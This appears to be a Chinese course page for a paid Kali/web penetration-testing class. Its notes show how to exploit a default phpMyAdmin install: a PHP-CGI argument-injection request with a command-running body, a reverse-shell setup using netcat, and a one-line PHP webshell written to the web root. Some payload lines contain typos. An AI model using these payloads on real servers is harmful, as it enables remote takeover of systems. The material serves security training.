6人加入学习
(0人评价)
安全测试Web安全

购买过Kali Linux渗透测试、武官课程包、安全技术会员课程的学员不要再买此课程

价格 ¥ 300.00
该课程属于 南华大学信息安全专业 请加入后再学习

手动漏洞挖掘
一 默认安装

1 默认安装-phpmyadmin
Windows默认安装后会开放一些端口 会有漏洞
远程操作漏洞
phpmyadmin/setup
POST http://192.168.56.101/phpMyAdmin/setup/不用登录 既可以访问 管理后台数据库

利用:
(1)
POST 
头:
http://192.168.56.101/phpMyAdmin/?-d+allow_url_inlcude%31+-d+auto_prepend_file%3dphp://input HTTP/1.1
Host:192.168.56.101
body:
<?php
passthru('id');
die();
?>
使用这个url写入php代码 使用工具重放攻击(repeater)可以用echo >重定向来写代码进去
(2)
PHP反弹shell(提交服务器请求 里面有反弹连接的shell 目的是shell在服务器执行然后反弹连接客户端的端口 本地开终端窗口监听这个端口)(拿到服务器shell)
/usr/share/webshells里面有asp等的木马
/usr/share/webshells/php-reverse-shell.php
vi一下 在内容进行修改 
nc nvvlp 端口 动态监听端口 开一个nc端口 在netstat查看端口可以更直观了解途径
ifconfig无法运行 那么可以这样
Whereis ifconfig
在ifconfig的目录下./ifconfig来使用该命令
(3)
写入webshell(在服务器写一个静态木马页面文件)
echo "<php \$cmd=\$_GET["cmd"];system(\$cmd);?>" > /var/www/3.php
服务器会把变量多虑 加\防止
网页木马的制作

[展开全文]

授课教师

安全经理

课程特色

视频(99)
下载资料(1)

最新学员